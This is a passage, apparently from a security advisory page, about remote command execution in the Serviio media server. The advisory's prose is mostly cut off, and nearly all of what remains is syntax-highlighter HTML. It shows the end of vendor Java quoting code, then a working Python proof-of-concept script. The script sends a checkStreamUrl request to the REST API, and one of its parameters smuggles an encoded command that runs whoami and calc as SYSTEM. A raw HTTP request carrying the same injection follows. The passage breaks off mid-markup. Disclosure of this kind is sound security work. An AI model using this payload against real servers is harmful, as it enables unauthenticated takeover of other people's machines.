class=\"crayon-v\">tempPath<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">newEnv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">putAll<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createFontConfigRuntimeEnvironmentVariables<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">isTraceEnabled<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">trace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Env variables: %s&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">newEnv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">newEnv<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">wrapInQuotes<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">ProcessExecutorParameter <\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">boolean<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">quotesNeeded<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">quotesNeeded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">quotesNeeded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">protected<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">boolean<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quotesNeededForWindows<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">ProcessExecutorParameter <\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">boolean<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">quotesNeeded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argument<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getValue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">indexOf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8221; &#8220;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">quotesNeeded<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">escapeAmpersandForWindows<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e656743756064-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">replaceAll<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&amp;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;^&amp;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e656743756064-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0076 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>The Proof of Concept will create a file <em>testingus3.txt<\/em> in &#8216;<em>C:Program FilesServiiobin<\/em>&#8216; with whoami output in it and start a <em>calc.exe<\/em> child process as <em>nt authoritysystem<\/em>.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590905ee7e65a154946920\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> from urllib2 import Request, urlopen  import sys    if (len(sys.argv) &lt;= 1):          print &#8216;[*] Usage: serviio_rce.py &lt;ip address&gt;&#8217;          exit(0)    host = sys.argv[1]    values = &#8220;&#8221;&#8221;  &lt;action&gt;      &lt;name&gt;checkStreamUrl&lt;\/name&gt;      &lt;parameter&gt;VIDEO&lt;\/parameter&gt;      &lt;parameter&gt;1.2.3.4&amp;#x27;&amp;#x5c;&amp;#x22;&amp;#x60;&amp;#x26;&amp;#x77;&amp;#x68;&amp;#x6f;&amp;#x61;&amp;#x6d;&amp;#x69;&amp;#x20;&amp;#x3e;&amp;#x74;&amp;#x65;&amp;#x73;&amp;#x74;&amp;#x69;&amp;#x6e;&amp;#x67;&amp;#x75;&amp;#x73;&amp;#x33;&amp;#x2e;&amp;#x74;&amp;#x78;&amp;#x74;&amp;#x26;&amp;#x26;&amp;#x63;&amp;#x61;&amp;#x6c;&amp;#x63;&amp;#x26;&amp;#x60;&amp;#x27;&lt;\/parameter&gt;  &lt;\/action&gt;&#8221;&#8221;&#8221;    headers = {    &#8216;Content-Type&#8217;: &#8216;application\/xml&#8217;,    &#8216;Accept&#8217;: &#8216;application\/xml&#8217;  }  request = Request(&#8216;http:\/\/&#8217;+host+&#8217;:23423\/rest\/action&#8217;, data=values, headers=headers)    response_body = urlopen(request).read()  print response_body      &#8221;&#8217;  Raw request:    POST \/rest\/action HTTP\/1.1  Host: 10.211.55.3:23423  Content-Length: 93  Accept: application\/json, text\/plain, *\/*  Origin: http:\/\/10.211.55.3:23423  User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/54.0.2840.98 Safari\/537.36  Content-Type: application\/json;charset=UTF-8  Referer: http:\/\/10.211.55.3:23423\/console\/  Accept-Encoding: gzip, deflate  Accept-Language: en-US,en;q=0.8  DNT: 1  Connection: close    {&#8220;name&#8221;:&#8221;checkStreamUrl&#8221;,&#8221;parameter&#8221;:[&#8220;VIDEO&#8221;,&#8221;1.2.3.4&#8242;&#8221;`&amp;whoami &gt;testingus3.txt&amp;&amp;calc&amp;`'&#8221;]}    &#8221;&#8217;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e65a154946920-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e65a154946920-45\">45<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-1\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">urllib2 <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">Request<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urlopen<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-4\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Usage: serviio_rce.py &lt;ip address&gt;&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-8\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-10\"><span class=\"crayon-v\">values<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-11\"><span class=\"crayon-s\">&lt;action&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-12\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;name&gt;checkStreamUrl&lt;\/name&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-13\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;parameter&gt;VIDEO&lt;\/parameter&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-14\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;parameter&gt;1.2.3.4&amp;#x27;&amp;#x5c;&amp;#x22;&amp;#x60;&amp;#x26;&amp;#x77;&amp;#x68;&amp;#x6f;&amp;#x61;&amp;#x6d;&amp;#x69;&amp;#x20;&amp;#x3e;&amp;#x74;&amp;#x65;&amp;#x73;&amp;#x74;&amp;#x69;&amp;#x6e;&amp;#x67;&amp;#x75;&amp;#x73;&amp;#x33;&amp;#x2e;&amp;#x74;&amp;#x78;&amp;#x74;&amp;#x26;&amp;#x26;&amp;#x63;&amp;#x61;&amp;#x6c;&amp;#x63;&amp;#x26;&amp;#x60;&amp;#x27;&lt;\/parameter&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-15\"><span class=\"crayon-s\">&lt;\/action&gt;&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-17\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-18\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Content-Type&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/xml&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-19\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Accept&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/xml&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-20\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-21\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:23423\/rest\/action&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">values<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-23\"><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-24\"><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">_<\/span>body<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-27\"><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-s\">&#8216;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-28\"><span class=\"crayon-s\">Raw request:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-30\"><span class=\"crayon-s\">POST \/rest\/action HTTP\/1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-31\"><span class=\"crayon-s\">Host: 10.211.55.3:23423<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-32\"><span class=\"crayon-s\">Content-Length: 93<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-33\"><span class=\"crayon-s\">Accept: application\/json, text\/plain, *\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-34\"><span class=\"crayon-s\">Origin: http:\/\/10.211.55.3:23423<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-35\"><span class=\"crayon-s\">User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/54.0.2840.98 Safari\/537.36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-36\"><span class=\"crayon-s\">Content-Type: application\/json;charset=UTF-8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-37\"><span class=\"crayon-s\">Referer: http:\/\/10.211.55.3:23423\/console\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-38\"><span class=\"crayon-s\">Accept-Encoding: gzip, deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e65a154946920-39\"><span class=\"crayon-s\">Accept-Language: en-US,en;q=0.8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e65a154946920-40\"><span class=\"crayon-s\">DNT: 1<\/span><\/div>\n<div 